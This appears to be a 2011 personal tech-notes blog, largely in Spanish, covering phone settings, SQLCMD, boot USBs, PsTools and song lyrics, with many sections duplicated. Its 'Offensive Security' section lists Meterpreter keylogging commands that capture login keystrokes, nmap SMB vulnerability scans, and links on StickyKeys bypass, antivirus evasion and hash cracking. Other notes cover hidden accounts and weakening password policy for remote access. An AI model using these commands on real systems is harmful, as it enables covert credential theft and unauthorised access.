Wednesday, July 13, 2011
Tuesday, July 12, 2011
Remove Administrator Password on Windows (Remover contraseña de Administrador)
Thursday, July 07, 2011
Tuesday, June 28, 2011
C.C. Catch::You Shot A Hole In My Soul
He's a midnight dream romancer
He's the only lonely dancer
Oh, only love breaks my heart
He's the nearest thing to heaven
Stole my heart and tried to say then
Oh, only love breaks my heart
You shot a hole in my soul
It's the kind out of love I know
You shot a hole in my soul
Hold on tight, don't let go
You get always what you want from me
You can make it easy, can't you see
You shot a hole, hole, hole
Hole in my soul
Dreams go on forever and ever
Good things do not last forever
Heaven can wait but I can't
But I'd do it once again, babe
I think tomorrow it's too late, babe
Oh, only love breaks my heart
He's the only lonely dancer
Oh, only love breaks my heart
He's the nearest thing to heaven
Stole my heart and tried to say then
Oh, only love breaks my heart
You shot a hole in my soul
It's the kind out of love I know
You shot a hole in my soul
Hold on tight, don't let go
You get always what you want from me
You can make it easy, can't you see
You shot a hole, hole, hole
Hole in my soul
Dreams go on forever and ever
Good things do not last forever
Heaven can wait but I can't
But I'd do it once again, babe
I think tomorrow it's too late, babe
Oh, only love breaks my heart
Monday, June 27, 2011
Monday, June 20, 2011
W810::Habilitar MMS y WAP
Primero:
Menú--> Ajustes--> Conectividad --> Comunic. de datos--> Cuentas de datos--> Nueva cuenta--> Datos GPRS--> Nombre: WAP GPRS
APN: wap.claro.pe
Nombre de usuario: claro
Contraseña: claro
(GUARDAR)
Segundo:
Menú--> Ajustes--> Conectividad--> Ajustes Internet--> Perfiles Internet--> Nuevo perfil-->
Nombre: Claro WAP
Conectar usando: (seleccionas la cuenta que creaste) WAP GPRS
(GUARDAR)
Tercero:
Seleccionas el perfil que creaste (Claro WAP) y le das MÁS. Luego seleccionas AJUSTES.
Verificas que en Uso de Proxy diga SI
Dirección de proxy: 192.168.231.30
Número de puerto: 80 //por defecto es 8080 me imagino que se quedaria asi si es que el tipo de navegación fuera http
(GUARDAR)
Para que esté activo el perfil recuerda de “seleccionarlo”.
Configuracion MMS
Primero:
Menú--> Ajustes--> Conectividad--> Comunic. de datos--> Cuentas de datos--> Nueva cuenta--> Datos GPRS--> Nombre: MMS GPRS
APN: mms.claro.pe
Nombre de usuario: claro
Contraseña:claro
(GUARDAR)
Segundo:
Menú--> Ajustes--> Conectividad--> Ajustes Internet--> Perfiles Internet--> Nuevo perfil-->
Nombre: Claro MMS
Conectar usando: (seleccionas la cuenta que creaste) MMS GPRS
(GUARDAR)
Tercero:
Seleccionas el perfil que creaste (Claro MMS) y le das MÁS. Luego AJUSTES.
Verificas que en Uso de Proxy diga SI
Dirección de proxy: 213.26.205.1
Número de puerto: 80
(GUARDAR)
Menú--> Mensajes--> Ajustes--> Msj con imagen--> Perfil MMS--> Nuevo perfil-->
Nombre Perfil MMS: Multimedia
Servidor de msjs: http://claro/servlets/mms
Perfil de internet: Claro MMS
(GUARDAR)
Referencias:
http://www.topsony.com/forum_es/general-f96/configuracion-wap-y-mms-para-claro-peru-t14503.html
Menú--> Ajustes--> Conectividad --> Comunic. de datos--> Cuentas de datos--> Nueva cuenta--> Datos GPRS--> Nombre: WAP GPRS
APN: wap.claro.pe
Nombre de usuario: claro
Contraseña: claro
(GUARDAR)
Segundo:
Menú--> Ajustes--> Conectividad--> Ajustes Internet--> Perfiles Internet--> Nuevo perfil-->
Nombre: Claro WAP
Conectar usando: (seleccionas la cuenta que creaste) WAP GPRS
(GUARDAR)
Tercero:
Seleccionas el perfil que creaste (Claro WAP) y le das MÁS. Luego seleccionas AJUSTES.
Verificas que en Uso de Proxy diga SI
Dirección de proxy: 192.168.231.30
Número de puerto: 80 //por defecto es 8080 me imagino que se quedaria asi si es que el tipo de navegación fuera http
(GUARDAR)
Para que esté activo el perfil recuerda de “seleccionarlo”.
Configuracion MMS
Primero:
Menú--> Ajustes--> Conectividad--> Comunic. de datos--> Cuentas de datos--> Nueva cuenta--> Datos GPRS--> Nombre: MMS GPRS
APN: mms.claro.pe
Nombre de usuario: claro
Contraseña:claro
(GUARDAR)
Segundo:
Menú--> Ajustes--> Conectividad--> Ajustes Internet--> Perfiles Internet--> Nuevo perfil-->
Nombre: Claro MMS
Conectar usando: (seleccionas la cuenta que creaste) MMS GPRS
(GUARDAR)
Tercero:
Seleccionas el perfil que creaste (Claro MMS) y le das MÁS. Luego AJUSTES.
Verificas que en Uso de Proxy diga SI
Dirección de proxy: 213.26.205.1
Número de puerto: 80
(GUARDAR)
Menú--> Mensajes--> Ajustes--> Msj con imagen--> Perfil MMS--> Nuevo perfil-->
Nombre Perfil MMS: Multimedia
Servidor de msjs: http://claro/servlets/mms
Perfil de internet: Claro MMS
(GUARDAR)
Referencias:
http://www.topsony.com/forum_es/general-f96/configuracion-wap-y-mms-para-claro-peru-t14503.html
Wednesday, June 15, 2011
Declaraciones SUNAT
https://www.sunat.gob.pe/cl-ta-itmenuagrupa/MenuInternet.htm
Referencias:
Como Instalar http://www.youtube.com/watch?v=y8XDcjIsQTY
Registrar declarante http://www.youtube.com/watch?v=wpTEHxaIFB8
Declarar IGV http://www.youtube.com/watch?v=lu1Z03zlL0g&feature=related
Referencias:
Como Instalar http://www.youtube.com/watch?v=y8XDcjIsQTY
Registrar declarante http://www.youtube.com/watch?v=wpTEHxaIFB8
Declarar IGV http://www.youtube.com/watch?v=lu1Z03zlL0g&feature=related
Tuesday, June 14, 2011
Monday, June 13, 2011
Offensive Security
Verify
nmap -sV -PN -p 445,137,139 --script=smb-check-vulns.nse
Meterpreter common commands
meterpreter > getprivs
meterpreter > migrate 2976
meterpreter > bglist
meterpreter > use -l
meterpreter > ?
meterpreter > bgrun keylogrecorder -c 1 -t 15
meterpreter> run keylogrecorder -c 1 -l -t 5
-c 1 to record a login session, "-l" to force logoff, and "-t 5" to deliver the keystrokes every 5 sec.
Basic meterpreter
Meterpreter Cllient commands
http://en.wikibooks.org/wiki/Metasploit/MeterpreterClient
Vulnerabilidad StickyKeys (sethc.exe)
http://foro.infiernohacker.com/index.php?topic=1867.0
Tools
http://www.md5decrypter.co.uk/
REG
http://ss64.com/nt/reg.html
Meterpreter REG
http://carnal0wnage.attackresearch.com/2007/06/defating-nod32-av.html
examples:
[1] Keylogging
http://www.offensive-security.com/metasploit-unleashed/Keylogging
[2] http://tekjournal.wordpress.com/2011/01/08/login-keystroke-recording/
[3] http://pctechtips.org/metasploit-getting-user-password-with-keylogrecorder/
[4] http://www.offensive-security.com/metasploit-unleashed/Meterpreter_Screen_Capture
[5] http://exploit.co.il/hacking/screenspy-meterpreter-script-review/
modules:
http://www.metasploit.com/modules/auxiliary/analyze/jtr_crack_fast
references:
[1] http://www.blueliv.com/downloads/Meterpreter_cheat_sheet_v0.1.pdf
[2] http://www.question-defense.com/2009/12/21/getting-started-with-meterpreter
[3] Custom exploit
http://www.pentester.es/2009/11/por-que-no-consigo-shell-con-mi.html
nmap -sV -PN
Meterpreter common commands
meterpreter > getprivs
meterpreter > migrate 2976
meterpreter > bglist
meterpreter > use -l
meterpreter > ?
meterpreter > bgrun keylogrecorder -c 1 -t 15
meterpreter> run keylogrecorder -c 1 -l -t 5
-c 1 to record a login session, "-l" to force logoff, and "-t 5" to deliver the keystrokes every 5 sec.
Basic meterpreter
Meterpreter Cllient commands
http://en.wikibooks.org/wiki/Metasploit/MeterpreterClient
Vulnerabilidad StickyKeys (sethc.exe)
http://foro.infiernohacker.com/index.php?topic=1867.0
Tools
http://www.md5decrypter.co.uk/
REG
http://ss64.com/nt/reg.html
Meterpreter REG
http://carnal0wnage.attackresearch.com/2007/06/defating-nod32-av.html
examples:
[1] Keylogging
http://www.offensive-security.com/metasploit-unleashed/Keylogging
[2] http://tekjournal.wordpress.com/2011/01/08/login-keystroke-recording/
[3] http://pctechtips.org/metasploit-getting-user-password-with-keylogrecorder/
[4] http://www.offensive-security.com/metasploit-unleashed/Meterpreter_Screen_Capture
[5] http://exploit.co.il/hacking/screenspy-meterpreter-script-review/
modules:
http://www.metasploit.com/modules/auxiliary/analyze/jtr_crack_fast
references:
[1] http://www.blueliv.com/downloads/Meterpreter_cheat_sheet_v0.1.pdf
[2] http://www.question-defense.com/2009/12/21/getting-started-with-meterpreter
[3] Custom exploit
http://www.pentester.es/2009/11/por-que-no-consigo-shell-con-mi.html
Thursday, June 09, 2011
Tuesday, June 07, 2011
Windows::Network commands(cmd)
net user
net user guest
net user invitado
To enable the Guest account for network access:
net user guest /active:yes
net user invitado /active:yes
To disable the Guest account for network access:
net user guest /active:no
net user invitado /active:no
netstat
References
[1] netstat http://commandwindows.com/netstat.htm
net user guest
net user invitado
To enable the Guest account for network access:
net user guest /active:yes
net user invitado /active:yes
To disable the Guest account for network access:
net user guest /active:no
net user invitado /active:no
netstat
References
[1] netstat http://commandwindows.com/netstat.htm
SQL Server::SQLCMD
cd C:\Archivos de programa\Microsoft SQL Server\100\Tools\Binn
C:..>SQLCMD -s 192.168.1.30 -U sa -P pass
sp_databases
use
sp_help tablename
select * from SYSOBJECTS where TYPE = 'U' order by NAME
references:
[1] http://msdn.microsoft.com/en-us/library/ms180944.aspx
[2] http://msdn.microsoft.com/en-us/library/ms165702.aspx
C:..>SQLCMD -s 192.168.1.30 -U sa -P pass
sp_databases
use
sp_help tablename
select * from SYSOBJECTS where TYPE = 'U' order by NAME
references:
[1] http://msdn.microsoft.com/en-us/library/ms180944.aspx
[2] http://msdn.microsoft.com/en-us/library/ms165702.aspx
Monday, June 06, 2011
Wednesday, June 01, 2011
Hiren's BootUSB
1. Download USB Disk Storage Format
2. Download Grub4Dos Installer
3.Run USB Disk Storage Format
4.Run Grub4Dos Installer
4.1 Disk
4.2 Refresh
4.3 While disk (MBR)
4.4 Install
5. Copy grldr and menu.lst (from HBCD folder) to the usb drive
6. Copy everything from CD(Hiren's BootCD) to USB Drive
7. reboot
References:
[1] Download iso http://www.hirensbootcd.org/download/
[2] http://www.hiren.info/pages/bootcd-on-usb-disk
2. Download Grub4Dos Installer
3.Run USB Disk Storage Format
4.Run Grub4Dos Installer
4.1 Disk
4.2 Refresh
4.3 While disk (MBR)
4.4 Install
5. Copy grldr and menu.lst (from HBCD folder) to the usb drive
6. Copy everything from CD(Hiren's BootCD) to USB Drive
7. reboot
References:
[1] Download iso http://www.hirensbootcd.org/download/
[2] http://www.hiren.info/pages/bootcd-on-usb-disk
Default Ports
Puerto | Desc. | Estado | Observaciones |
20 | FTP | cerrado | Utilizado por FTP |
21 | FTP | cerrado | Utilizado por FTP |
22 | SSH | abierto | Secure Shell. |
23 | TELNET | cerrado | Acceso remoto |
25 | SMTP | cerrado | Servidor de correo SMTP |
53 | DNS | cerrado | Servidor DNS |
79 | FINGER | cerrado | Servidor de información de usuarios de un PC |
80 | HTTP | abierto | Servidor web |
110 | POP3 | cerrado | Servidor de correo POP3 |
119 | NNTP | cerrado | Servidor de noticias |
135 | DCOM-scm | cerrado | Solo se puede cerrar a través de un cortafuegos |
139 | NETBIOS | cerrado | Compartición de Ficheros a través de una red |
143 | IMAP | cerrado | Servidor de correo IMAP |
389 | LDAP | cerrado | LDAP. Tambien Puede ser utilizado por Neetmeting |
443 | HTTPS | cerrado | Servidor web seguro |
445 | MSFT DS | cerrado | Server Message Block. |
631 | IPP | cerrado | Servidor de Impresion |
1433 | MS SQL | cerrado | Base de Datos de Microsoft |
3306 | MYSQL | cerrado | Base de Datos. MYSQL |
5000 | UPnP | cerrado | En windows está activado este puerto por defecto. |
Wednesday, May 25, 2011
Tuesday, May 24, 2011
Windows.:Hidden user account
http://juliorestrepo.wordpress.com/2008/09/19/trucos-regedit-como-ocultar-una-cuenta-de-usuario-de-la-pantalla-de-bienvenida-de-windows-xp/
Friday, May 20, 2011
TV
KWorld page
http://us.kworld-global.com/main/index.aspx?flag=1
Resources:
[1] Other Driver http://www.nodevice.com/driver/PVR-TV_305UDE/get44169.html
[2] Original Driver http://www.kworld-global.com/main/support_down.aspx?mnuid=1255&modid=14&flag=1
http://us.kworld-global.com/main/index.aspx?flag=1
Resources:
[1] Other Driver http://www.nodevice.com/driver/PVR-TV_305UDE/get44169.html
[2] Original Driver http://www.kworld-global.com/main/support_down.aspx?mnuid=1255&modid=14&flag=1
Thursday, May 19, 2011
PsTools::Remote tools
Share resource
NET SHARE sharename=drive:path /REMARK:"text" [/CACHE:Manual | Automatic | No ]
NET SHARE temp=c:\tmp /REMARK:"temporal files"
Drop share.
NET SHARE {sharename | devicename | drive:path} /DELETE
NET SHARE temp
Show resources
net view \\192.168.1.x
Open remote console
psexec \\IP -u USER -p PASSWORD
If Access denied(Acceso denegado) results, then:
Start, Control Panel, Administrative Tools,Local Security Policy.
Open the Local Policies, Security Options.
Accounts: Limit local account use of blank passwords to console logon only set to Disabled.
if don't work try:
Network access: Sharing and security model for local accounts set to "Classic - local users authenticate as themselves".
Notes(Remote Computer):
a) Debe tener habilitada la opción de "Compartir impresoras y archivos" (Inicio -> Ejecutar.... ncpa.cpl)
b) Debe tener deshabilitada la opción "Utilizar uso compartido simple de archivos"
c) Si tiene habilitado algún firewall debe permitir las conexiones por los puertos NetBIOS.
d) La máquina remota debe correr win NT, 2000, XP Pro, Vista o Server 2003
e) Tener usuario y contraseña válidos en la máquina remota
f) La máquina remota debe tener habilitado el recurso IPC$ y ADMIN$
g) La máquina remota debe tener iniciados los servicios NetLogon y Server
resources:
[1] psTools Download http://technet.microsoft.com/en-us/sysinternals/bb897553
[2] HOW TO: Restore Administrative Shares That Have Been Deleted http://support.microsoft.com/kb/318755
[3] Windows XP Professional File Sharing http://www.practicallynetworked.com/sharing/xp_filesharing/index.htm
[4] How to use the Simple File Sharing feature to share files in Windows XP http://support.microsoft.com/kb/304040
NET SHARE sharename=drive:path /REMARK:"text" [/CACHE:Manual | Automatic | No ]
NET SHARE temp=c:\tmp /REMARK:"temporal files"
Drop share.
NET SHARE {sharename | devicename | drive:path} /DELETE
NET SHARE temp
Show resources
net view \\192.168.1.x
Open remote console
psexec \\IP -u USER -p PASSWORD
If Access denied(Acceso denegado) results, then:
Start, Control Panel, Administrative Tools,Local Security Policy.
Open the Local Policies, Security Options.
Accounts: Limit local account use of blank passwords to console logon only set to Disabled.
if don't work try:
Network access: Sharing and security model for local accounts set to "Classic - local users authenticate as themselves".
Notes(Remote Computer):
a) Debe tener habilitada la opción de "Compartir impresoras y archivos" (Inicio -> Ejecutar.... ncpa.cpl)
b) Debe tener deshabilitada la opción "Utilizar uso compartido simple de archivos"
c) Si tiene habilitado algún firewall debe permitir las conexiones por los puertos NetBIOS.
d) La máquina remota debe correr win NT, 2000, XP Pro, Vista o Server 2003
e) Tener usuario y contraseña válidos en la máquina remota
f) La máquina remota debe tener habilitado el recurso IPC$ y ADMIN$
g) La máquina remota debe tener iniciados los servicios NetLogon y Server
resources:
[1] psTools Download http://technet.microsoft.com/en-us/sysinternals/bb897553
[2] HOW TO: Restore Administrative Shares That Have Been Deleted http://support.microsoft.com/kb/318755
[3] Windows XP Professional File Sharing http://www.practicallynetworked.com/sharing/xp_filesharing/index.htm
[4] How to use the Simple File Sharing feature to share files in Windows XP http://support.microsoft.com/kb/304040
Subscribe to:
Posts (Atom)
-
Resources: [1] Hela https://ome.grc.nia.nih.gov/iicbu2008/hela/index.html
-
en inglés se llama “A potentially dangerous Request.Form value was detected from the client”. varias páginas indican dos cosas: 1. agrega...
-
mas plugins http://devsnippets.com/reviews/using-jquery-to-style-design-elements-20-impressive-plugins.html http://www.extjs.com/deploy/dev/...
Ubuntu Forware port 80
#!/bin/bash iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8069 iptables -t nat -A PREROUTING -i eth0 -p tc...